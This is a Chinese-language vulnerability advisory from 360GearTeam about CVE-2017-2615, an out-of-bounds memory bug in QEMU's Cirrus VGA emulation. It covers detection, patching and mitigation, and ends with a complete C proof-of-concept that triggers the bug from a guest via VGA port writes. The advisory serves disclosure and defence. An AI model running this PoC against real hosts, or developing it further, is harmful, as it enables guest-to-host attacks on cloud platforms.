首页
活动
招聘
安全导航

【漏洞预警】比“毒液”更恐怖!QEMU再曝高危漏洞(更新PoC)

阅读量194278

|

发布时间 : 2017-02-22 11:50:46

http://p7.qhimg.com/t01d3d9fe84065970af.jpg

漏洞描述

近期QEMU官方修复了由360GearTeam研究员李强报告的一个严重漏洞CVE-2017-2615,这是QEMU的VGA设备Cirrus CLGD 54xx VGA中存在一个内存越界访问读写漏洞,可以造成宿主机层面的任意代码执行,Xen官方对此漏洞编号为XSA-208。

QEMU是全球流行的开源虚拟化软件。黑客攻击者一旦利用QEMU漏洞控制宿主机,除了利用宿主机强大的性能,可以进行比特币挖矿、密码暴力破解,还可窃取宿主机所有的虚拟机数据甚至进一步的云平台内部横向攻击,危害非常严重

由于历史原因及软件兼容性的考虑,很长一段时间QEMU的默认VGA设备是Cirrus CLGD 54xx VGA。使用QEMU作为用户态模拟的虚拟化软件如KVM,Xen(HVM模式)的VGA也默认是Cirrus,所以该漏洞会影响到使用KVM及Xen的云平台。

经过实际的版本比对分析,国内主流的公有云平台受到此漏洞影响,应尽快执行升级修复,目前已经有相关受影响公有云平台启动了修复计划。


http://p9.qhimg.com/t01a36cb5c5007e265a.png


漏洞检测

由于该漏洞存在于cirrus vga的模拟中,可以在guest中直接执行lspci(相关的软件包是pciutils)查看vga是否是cirrus,如果是则存在该漏洞,如下图:

http://p0.qhimg.com/t0108b1e9e77fa03bae.png


修复方案

经过360GearTeam安全团队的分析,建议参考以下任一策略进行修复。

1. 自行更新QEMU版本或更新对补丁进行修复

补丁链接: https://lists.gnu.org/archive/html/qemu-devel/2017-02/msg00015.html 

http://p3.qhimg.com/t01fcdfb79d7d749a84.png

2. 修改启动虚拟机相关选项,不使用cirrus vga,改用std vga或者virtio vga

事实上,cirrus vga是90年代早期的设备,存在各种bug和安全问题。详细可以参考qemu vga的维护者Gerd Hoffmann的这篇文章qemu: using cirrus considered harmful(https://www.kraxel.org/blog/2014/10/qemu-using-cirrus-considered-harmful/ )。在qemu的upstream中,已经准备放弃cirrus显卡模拟。


漏洞细节

该漏洞存在于Cirrus VGA的bitblt操作中,bitblt是bit block transfer的缩写。在VGA模拟中,会分配一段内存vram作为VGA的显示区域,进行bitblt的拷贝操作时,会在这个内存区域中进行数据的拷贝与传输。

该漏洞即发生在向后拷贝的安全检查中,直接看补丁。

http://p5.qhimg.com/t0160d15403b407023c.png

在补丁中,pitch < 0时,表示是从vram的后面往前面拷贝数据,min表示的是前面的起始位置。未打补丁之前,会允许读写vram的前面部分,这可能导致读host的信息,也可能导致代码执行,造成宿主机层面代码任意执行。

运行PoC(漏洞验证代码)之后,在宿主机可以看到QEMU处于一个不正常的状态。

http://p2.qhimg.com/t01fcdfb79d7d749a84.png

更新PoC

/*
 *  CVE-2017-2615 PoC 
 * 
 *  Qiang Li of the Gear Team, Qihoo 360 Inc.
 *  
 *  #gcc poc.c -o poc
 *  #./poc 
 *
*/
#include <sys/io.h>
#include <stdio.h>
 
void write_sr(int idx,int val)
{
      outb(idx,0x3c4);
      outb(val,0x3c5);
}
void write_gr(int idx,int val)
{
        outb(idx,0x3ce);
        outb(val,0x3cf);
}

int main()
{
        iopl(3);
        write_sr(0x07,1);
        write_gr(0x31,0x80);
        write_gr(0x26,0xff);
        write_gr(0x27,0xff);
        write_gr(0x24,1);
        write_gr(0x20,0xff);
        write_gr(0x21,0xff);
        write_gr(0x22,0x0);
        write_gr(0x23,0x0);
        write_gr(0x28,0);
        write_gr(0x29,0);
        write_gr(0x2a,0);
        write_gr(0x2c,0xff);
        write_gr(0x2d,0xff);
        write_gr(0x2e,0xff);
        write_gr(0x30,1);
        write_gr(0x2a,0);
        return 0;
}

关于360GearTeam

360 Gear Team360公司一支专注于云安全与互联网核心开源组件安全研究的新锐团队,2016年获QEMUXenVirtualBoxDocker等虚拟化软件致谢67次,以及OpenSSLNTPFirefox等重要开源项目致谢49次,成立不到一年就荣获了上百次漏洞报告致谢。团队在保卫360自身内部业务的同时,也在守护互联网的安全。

本文由360GearTeam原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/85535

安全客 - 有思想的安全新媒体

分享到:微信
+11赞
收藏
360GearTeam
分享到:微信

发表评论

360GearTeam

隶属于360集团信息安全部,专注于云主机安全和云原生安全领域威胁分析和安全研究。

  • 文章
  • 38
  • 粉丝
  • 21

TA的文章

相关文章

热门推荐

文章目录
安全客
商务合作
内容需知
  • 投稿须知
  • 转载须知
  • 官网QQ群8:819797106
  • 官网QQ群3:830462644(已满)
  • 官网QQ群2:814450983(已满)
  • 官网QQ群1:702511263(已满)
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 360网络攻防实验室 安全客 All Rights Reserved 京ICP备08010314号-66